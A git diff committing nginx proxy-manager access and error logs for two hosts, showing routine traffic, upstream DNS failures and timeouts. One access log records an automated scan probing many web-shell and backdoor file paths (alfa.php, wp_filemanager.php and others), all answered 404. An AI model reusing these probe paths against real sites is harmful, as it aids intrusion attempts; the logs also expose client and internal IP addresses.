[Client 178.164.141.189] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[02/Feb/2026:19:26:06 +0000] - 404 404 - GET https dev.profibot.hu "/favicon.ico" [Client 178.164.141.189] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://dev.profibot.hu/" +[02/Feb/2026:19:26:35 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 178.164.141.189] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[02/Feb/2026:19:26:53 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 37.76.18.194] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "-" +[02/Feb/2026:19:26:54 +0000] - 404 404 - GET https dev.profibot.hu "/favicon.ico" [Client 37.76.18.194] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/" +[02/Feb/2026:19:26:56 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 142.250.33.37] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[02/Feb/2026:19:26:56 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 142.250.33.37] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[02/Feb/2026:19:26:56 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 142.250.33.38] [Length 52] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[02/Feb/2026:19:27:25 +0000] - 200 200 - GET https dev.profibot.hu "/docs" [Client 178.164.141.189] [Length 517] [Gzip 1.90] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "-" +[02/Feb/2026:19:27:26 +0000] - 200 200 - GET https dev.profibot.hu "/api/v2/openapi.json" [Client 178.164.141.189] [Length 14059] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36" "https://dev.profibot.hu/docs" diff --git a/proxy-manager/data/logs/proxy-host-2_access.log.1.gz b/proxy-manager/data/logs/proxy-host-2_access.log.1.gz new file mode 100755 index 0000000..189a727 Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-2_access.log.1.gz differ diff --git a/proxy-manager/data/logs/proxy-host-2_access.log.2.gz b/proxy-manager/data/logs/proxy-host-2_access.log.2.gz new file mode 100755 index 0000000..1823709 Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-2_access.log.2.gz differ diff --git a/proxy-manager/data/logs/proxy-host-2_access.log.3.gz b/proxy-manager/data/logs/proxy-host-2_access.log.3.gz new file mode 100755 index 0000000..df0f8c3 Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-2_access.log.3.gz differ diff --git a/proxy-manager/data/logs/proxy-host-2_error.log b/proxy-manager/data/logs/proxy-host-2_error.log new file mode 100755 index 0000000..62870a3 --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-2_error.log @@ -0,0 +1,55 @@ +2026/01/11 22:51:36 [warn] 192#192: *27 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/00/0000000001 while reading upstream, client: 37.76.14.85, server: dev.profibot.hu, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.19.0.4:80/static/js/generated/vendor.others.js?ver=91100", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/login?next=/" +2026/01/12 08:45:59 [warn] 212#212: *4338 using uninitialized "server" variable while logging request, client: 143.198.39.172, server: dev.profibot.hu +2026/01/12 13:48:33 [warn] 218#218: *4487 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/48/0000001488 while reading upstream, client: 62.210.198.211, server: dev.profibot.hu, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.19.0.4:80/static/js/generated/vendor.react.js?ver=91100", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/login?next=/" +2026/01/12 13:48:33 [warn] 219#219: *4494 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/48/0000001489 while reading upstream, client: 62.210.198.211, server: dev.profibot.hu, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.19.0.4:80/static/js/generated/vendor.sqleditor.js?ver=91100", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/login?next=/" +2026/01/12 13:48:33 [warn] 218#218: *4493 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/49/0000001490 while reading upstream, client: 62.210.198.211, server: dev.profibot.hu, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.19.0.4:80/static/js/generated/vendor.main.js?ver=91100", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/login?next=/" +2026/01/12 13:48:33 [warn] 219#219: *4495 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/49/0000001491 while reading upstream, client: 62.210.198.211, server: dev.profibot.hu, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.19.0.4:80/static/js/generated/vendor.others.js?ver=91100", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/login?next=/" +2026/01/17 15:02:19 [warn] 372#372: *247705 using uninitialized "server" variable while logging request, client: 136.117.98.44, server: dev.profibot.hu +2026/01/19 13:22:13 [warn] 431#431: *316673 using uninitialized "server" variable while logging request, client: 62.210.198.214, server: dev.profibot.hu, request: "HEAD / HTTP/1.1", host: "dev.profibot.hu:443" +2026/01/19 13:22:14 [warn] 431#431: *316675 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/12/0000152125 while reading upstream, client: 62.210.198.214, server: dev.profibot.hu, request: "GET /static/js/generated/vendor.react.js?ver=91100 HTTP/1.1", upstream: "http://172.19.0.4:80/static/js/generated/vendor.react.js?ver=91100", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/login?next=/" +2026/01/19 13:22:14 [warn] 431#431: *316674 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/12/0000152126 while reading upstream, client: 62.210.198.214, server: dev.profibot.hu, request: "GET /static/js/generated/vendor.main.js?ver=91100 HTTP/1.1", upstream: "http://172.19.0.4:80/static/js/generated/vendor.main.js?ver=91100", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/login?next=/" +2026/01/19 13:22:14 [warn] 431#431: *316680 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/12/0000152127 while reading upstream, client: 62.210.198.214, server: dev.profibot.hu, request: "GET /static/js/generated/vendor.sqleditor.js?ver=91100 HTTP/1.1", upstream: "http://172.19.0.4:80/static/js/generated/vendor.sqleditor.js?ver=91100", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/login?next=/" +2026/01/19 13:22:15 [warn] 431#431: *316682 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/12/0000152128 while reading upstream, client: 62.210.198.214, server: dev.profibot.hu, request: "GET /static/js/generated/vendor.others.js?ver=91100 HTTP/1.1", upstream: "http://172.19.0.4:80/static/js/generated/vendor.others.js?ver=91100", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/login?next=/" +2026/01/19 21:17:08 [error] 446#446: *317286 service_finder_api could not be resolved (2: Server failure), client: 37.76.9.111, server: dev.profibot.hu, request: "GET /docs HTTP/1.1", host: "dev.profibot.hu" +2026/01/19 21:17:08 [error] 446#446: *317286 service_finder_api could not be resolved (2: Server failure), client: 37.76.9.111, server: dev.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/docs" +2026/01/19 21:17:16 [error] 446#446: *317286 service_finder_api could not be resolved (2: Server failure), client: 37.76.9.111, server: dev.profibot.hu, request: "GET /docs HTTP/1.1", host: "dev.profibot.hu" +2026/01/19 21:17:16 [error] 446#446: *317286 service_finder_api could not be resolved (2: Server failure), client: 37.76.9.111, server: dev.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/docs" +2026/01/19 21:18:04 [error] 446#446: *317286 service_finder_api could not be resolved (2: Server failure), client: 37.76.9.111, server: dev.profibot.hu, request: "GET /redoc HTTP/1.1", host: "dev.profibot.hu" +2026/01/19 21:18:04 [error] 446#446: *317286 service_finder_api could not be resolved (2: Server failure), client: 37.76.9.111, server: dev.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/redoc" +2026/01/19 21:18:05 [error] 444#444: *317298 service_finder_api could not be resolved (2: Server failure), client: 66.249.93.77, server: dev.profibot.hu, request: "GET /redoc HTTP/1.1", host: "dev.profibot.hu" +2026/01/19 21:18:06 [error] 444#444: *317300 service_finder_api could not be resolved (2: Server failure), client: 66.249.83.107, server: dev.profibot.hu, request: "GET /redoc HTTP/1.1", host: "dev.profibot.hu" +2026/01/19 21:18:06 [error] 444#444: *317301 service_finder_api could not be resolved (2: Server failure), client: 66.102.8.171, server: dev.profibot.hu, request: "GET /redoc HTTP/1.1", host: "dev.profibot.hu" +2026/01/20 21:31:31 [error] 250#250: *6247 service_finder_api could not be resolved (2: Server failure), client: 204.76.203.25, server: dev.profibot.hu, request: "GET / HTTP/1.1", host: "dev.profibot.hu" +2026/01/21 19:52:32 [error] 281#281: *20153 service_finder_api could not be resolved (2: Server failure), client: 51.89.23.223, server: dev.profibot.hu, request: "GET / HTTP/1.1", host: "dev.profibot.hu" +2026/01/21 22:35:12 [error] 281#281: *23308 service_finder_api could not be resolved (2: Server failure), client: 84.254.106.197, server: dev.profibot.hu, request: "GET / HTTP/1.1", host: "dev.profibot.hu" +2026/01/21 22:35:12 [error] 281#281: *23308 service_finder_api could not be resolved (2: Server failure), client: 84.254.106.197, server: dev.profibot.hu, request: "GET /js/twint_ch.js HTTP/1.1", host: "dev.profibot.hu" +2026/01/21 22:35:12 [error] 281#281: *23308 service_finder_api could not be resolved (2: Server failure), client: 84.254.106.197, server: dev.profibot.hu, request: "GET /css/support_parent.css HTTP/1.1", host: "dev.profibot.hu" +2026/01/21 22:35:12 [error] 281#281: *23308 service_finder_api could not be resolved (2: Server failure), client: 84.254.106.197, server: dev.profibot.hu, request: "GET /js/lkk_ch.js HTTP/1.1", host: "dev.profibot.hu" +2026/01/22 10:53:01 [error] 292#292: *28881 service_finder_api could not be resolved (2: Server failure), client: 84.1.26.27, server: dev.profibot.hu, request: "GET / HTTP/1.1", host: "dev.profibot.hu" +2026/01/22 10:53:01 [error] 292#292: *28881 service_finder_api could not be resolved (2: Server failure), client: 84.1.26.27, server: dev.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/" +2026/01/22 11:12:05 [error] 299#299: *28988 service_finder_api could not be resolved (2: Server failure), client: 37.76.14.132, server: dev.profibot.hu, request: "GET / HTTP/1.1", host: "dev.profibot.hu" +2026/01/22 11:12:05 [error] 299#299: *28988 service_finder_api could not be resolved (2: Server failure), client: 37.76.14.132, server: dev.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/" +2026/01/22 11:12:06 [error] 299#299: *28989 service_finder_api could not be resolved (2: Server failure), client: 66.249.81.5, server: dev.profibot.hu, request: "GET / HTTP/1.1", host: "dev.profibot.hu" +2026/01/22 11:12:07 [error] 299#299: *28990 service_finder_api could not be resolved (2: Server failure), client: 66.102.8.171, server: dev.profibot.hu, request: "GET / HTTP/1.1", host: "dev.profibot.hu" +2026/01/22 11:12:07 [error] 299#299: *28991 service_finder_api could not be resolved (2: Server failure), client: 66.102.8.173, server: dev.profibot.hu, request: "GET / HTTP/1.1", host: "dev.profibot.hu" +2026/01/22 18:25:19 [error] 320#320: *35034 service_finder_api could not be resolved (2: Server failure), client: 37.76.11.122, server: dev.profibot.hu, request: "GET / HTTP/1.1", host: "dev.profibot.hu" +2026/01/22 18:25:20 [error] 320#320: *35034 service_finder_api could not be resolved (2: Server failure), client: 37.76.11.122, server: dev.profibot.hu, request: "GET / HTTP/1.1", host: "dev.profibot.hu" +2026/01/22 18:25:20 [error] 320#320: *35034 service_finder_api could not be resolved (2: Server failure), client: 37.76.11.122, server: dev.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/" +2026/01/22 18:25:22 [error] 320#320: *35034 service_finder_api could not be resolved (2: Server failure), client: 37.76.11.122, server: dev.profibot.hu, request: "GET / HTTP/1.1", host: "dev.profibot.hu" +2026/01/22 18:25:22 [error] 320#320: *35034 service_finder_api could not be resolved (2: Server failure), client: 37.76.11.122, server: dev.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/" +2026/01/22 18:26:33 [error] 317#317: *35041 service_finder_api could not be resolved (2: Server failure), client: 37.76.11.122, server: dev.profibot.hu, request: "GET / HTTP/1.1", host: "dev.profibot.hu" +2026/01/22 18:26:33 [error] 317#317: *35041 service_finder_api could not be resolved (2: Server failure), client: 37.76.11.122, server: dev.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/" +2026/01/22 18:26:35 [error] 317#317: *35041 service_finder_api could not be resolved (2: Server failure), client: 37.76.11.122, server: dev.profibot.hu, request: "GET / HTTP/1.1", host: "dev.profibot.hu" +2026/01/22 18:26:35 [error] 317#317: *35041 service_finder_api could not be resolved (2: Server failure), client: 37.76.11.122, server: dev.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/" +2026/01/22 18:26:48 [error] 317#317: *35041 service_finder_api could not be resolved (2: Server failure), client: 37.76.11.122, server: dev.profibot.hu, request: "GET /docs HTTP/1.1", host: "dev.profibot.hu" +2026/01/22 18:26:48 [error] 317#317: *35041 service_finder_api could not be resolved (2: Server failure), client: 37.76.11.122, server: dev.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/docs" +2026/01/22 18:26:50 [error] 317#317: *35041 service_finder_api could not be resolved (2: Server failure), client: 37.76.11.122, server: dev.profibot.hu, request: "GET /docs HTTP/1.1", host: "dev.profibot.hu" +2026/01/22 18:26:50 [error] 317#317: *35041 service_finder_api could not be resolved (2: Server failure), client: 37.76.11.122, server: dev.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/docs" +2026/01/22 18:26:52 [error] 317#317: *35041 service_finder_api could not be resolved (2: Server failure), client: 37.76.11.122, server: dev.profibot.hu, request: "GET /docs HTTP/1.1", host: "dev.profibot.hu" +2026/01/22 18:26:52 [error] 317#317: *35041 service_finder_api could not be resolved (2: Server failure), client: 37.76.11.122, server: dev.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/docs" +2026/01/22 18:27:31 [error] 317#317: *35041 service_finder_api could not be resolved (2: Server failure), client: 37.76.11.122, server: dev.profibot.hu, request: "GET /docs HTTP/1.1", host: "dev.profibot.hu" +2026/01/22 18:27:31 [error] 317#317: *35041 service_finder_api could not be resolved (2: Server failure), client: 37.76.11.122, server: dev.profibot.hu, request: "GET /favicon.ico HTTP/1.1", host: "dev.profibot.hu", referrer: "https://dev.profibot.hu/docs" +2026/01/22 18:41:41 [error] 337#337: *35101 upstream timed out (110: Connection timed out) while connecting to upstream, client: 37.76.11.122, server: dev.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://192.168.100.43:8000/", host: "dev.profibot.hu" +2026/01/22 18:46:41 [error] 335#335: *35166 upstream timed out (110: Connection timed out) while connecting to upstream, client: 37.76.11.122, server: dev.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://192.168.100.43:8000/", host: "dev.profibot.hu" +2026/01/22 19:02:00 [error] 337#337: *35210 upstream timed out (110: Connection timed out) while connecting to upstream, client: 37.76.12.67, server: dev.profibot.hu, request: "GET / HTTP/1.1", upstream: "http://192.168.100.43:8000/", host: "dev.profibot.hu" +2026/01/27 00:01:42 [warn] 222#222: *1731 using uninitialized "server" variable while logging request, client: 62.210.198.160, server: dev.profibot.hu, request: "HEAD / HTTP/1.1", host: "dev.profibot.hu:443" diff --git a/proxy-manager/data/logs/proxy-host-2_error.log.1.gz b/proxy-manager/data/logs/proxy-host-2_error.log.1.gz new file mode 100755 index 0000000..1149ccf Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-2_error.log.1.gz differ diff --git a/proxy-manager/data/logs/proxy-host-2_error.log.2.gz b/proxy-manager/data/logs/proxy-host-2_error.log.2.gz new file mode 100755 index 0000000..251186e Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-2_error.log.2.gz differ diff --git a/proxy-manager/data/logs/proxy-host-2_error.log.3.gz b/proxy-manager/data/logs/proxy-host-2_error.log.3.gz new file mode 100755 index 0000000..e1e9cd5 Binary files /dev/null and b/proxy-manager/data/logs/proxy-host-2_error.log.3.gz differ diff --git a/proxy-manager/data/logs/proxy-host-3_access.log b/proxy-manager/data/logs/proxy-host-3_access.log new file mode 100755 index 0000000..bb05bb2 --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-3_access.log @@ -0,0 +1,793 @@ +[12/Jan/2026:00:37:28 +0000] - - 301 - GET http targetts.ddns.net "/" [Client 23.95.96.140] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "-" +[12/Jan/2026:00:37:29 +0000] - 302 302 - GET https targetts.ddns.net "/" [Client 23.95.96.140] [Length 213] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "http://targetts.ddns.net/" +[12/Jan/2026:00:37:29 +0000] - 200 200 - GET https targetts.ddns.net "/login?next=/" [Client 23.95.96.140] [Length 2390] [Gzip -] [Sent-to 172.17.0.1] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "https://targetts.ddns.net/" +[12/Jan/2026:04:18:34 +0000] - - 301 - GET http targetts.ddns.net "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:35 +0000] - 404 404 - GET https targetts.ddns.net "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:35 +0000] - - 301 - GET http targetts.ddns.net "/rymmm.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:35 +0000] - 404 404 - GET https targetts.ddns.net "/rymmm.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:35 +0000] - - 301 - GET http targetts.ddns.net "/ws34.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:35 +0000] - 404 404 - GET https targetts.ddns.net "/ws34.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:36 +0000] - - 301 - GET http targetts.ddns.net "/ws45.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:36 +0000] - 404 404 - GET https targetts.ddns.net "/ws45.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:36 +0000] - - 301 - GET http targetts.ddns.net "/xxw.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:36 +0000] - 404 404 - GET https targetts.ddns.net "/xxw.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:36 +0000] - - 301 - GET http targetts.ddns.net "/ws33.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:37 +0000] - 404 404 - GET https targetts.ddns.net "/ws33.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:37 +0000] - - 301 - GET http targetts.ddns.net "/lm13.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:37 +0000] - 404 404 - GET https targetts.ddns.net "/lm13.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:37 +0000] - - 301 - GET http targetts.ddns.net "/ws38.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:37 +0000] - 404 404 - GET https targetts.ddns.net "/ws38.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:38 +0000] - - 301 - GET http targetts.ddns.net "/xeqdlun.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:38 +0000] - 404 404 - GET https targetts.ddns.net "/xeqdlun.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:38 +0000] - - 301 - GET http targetts.ddns.net "/ws37.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:38 +0000] - 404 404 - GET https targetts.ddns.net "/ws37.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:39 +0000] - - 301 - GET http targetts.ddns.net "/ws36.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:39 +0000] - 404 404 - GET https targetts.ddns.net "/ws36.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:39 +0000] - - 301 - GET http targetts.ddns.net "/xinder.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:39 +0000] - 404 404 - GET https targetts.ddns.net "/xinder.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:39 +0000] - - 301 - GET http targetts.ddns.net "/rendi59.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:40 +0000] - 404 404 - GET https targetts.ddns.net "/rendi59.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:40 +0000] - - 301 - GET http targetts.ddns.net "/test/lm.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:40 +0000] - 404 404 - GET https targetts.ddns.net "/test/lm.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:40 +0000] - - 301 - GET http targetts.ddns.net "/style2.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:41 +0000] - 404 404 - GET https targetts.ddns.net "/style2.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:41 +0000] - - 301 - GET http targetts.ddns.net "//alfa.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:41 +0000] - 404 404 - GET https targetts.ddns.net "//alfa.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:41 +0000] - - 301 - GET http targetts.ddns.net "/wpupex.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:41 +0000] - 404 404 - GET https targetts.ddns.net "/wpupex.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:42 +0000] - - 301 - GET http targetts.ddns.net "/ava.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:42 +0000] - 404 404 - GET https targetts.ddns.net "/ava.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:42 +0000] - - 301 - GET http targetts.ddns.net "/nks.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:42 +0000] - 404 404 - GET https targetts.ddns.net "/nks.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:43 +0000] - - 301 - GET http targetts.ddns.net "//wp-content/languages/index.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:43 +0000] - 404 404 - GET https targetts.ddns.net "//wp-content/languages/index.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:43 +0000] - - 301 - GET http targetts.ddns.net "//wp-content/uploads/index.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:43 +0000] - 404 404 - GET https targetts.ddns.net "//wp-content/uploads/index.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:43 +0000] - - 301 - GET http targetts.ddns.net "/ss.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:44 +0000] - 404 404 - GET https targetts.ddns.net "/ss.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:44 +0000] - - 301 - GET http targetts.ddns.net "/.well-known/content.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:44 +0000] - 404 404 - GET https targetts.ddns.net "/.well-known/content.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:44 +0000] - - 301 - GET http targetts.ddns.net "/sxo.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:44 +0000] - 404 404 - GET https targetts.ddns.net "/sxo.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:45 +0000] - - 301 - GET http targetts.ddns.net "//wp-content/themes/hideo/network.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:45 +0000] - 404 404 - GET https targetts.ddns.net "//wp-content/themes/hideo/network.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:45 +0000] - - 301 - GET http targetts.ddns.net "/cache/wp-post-data.php" [Client 20.239.71.136] [Length 166] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:46 +0000] - 404 404 - GET https targetts.ddns.net "/cache/wp-post-data.php" [Client 20.239.71.136] [Length 207] [Gzip -] [Sent-to 172.17.0.1] "-" "-" +[12/Jan/2026:04:18:46 +0000] - - 301 - GET http targetts.ddns.net "/uploads/Casper.php" [Client 20.239.71.136] [Length 166] 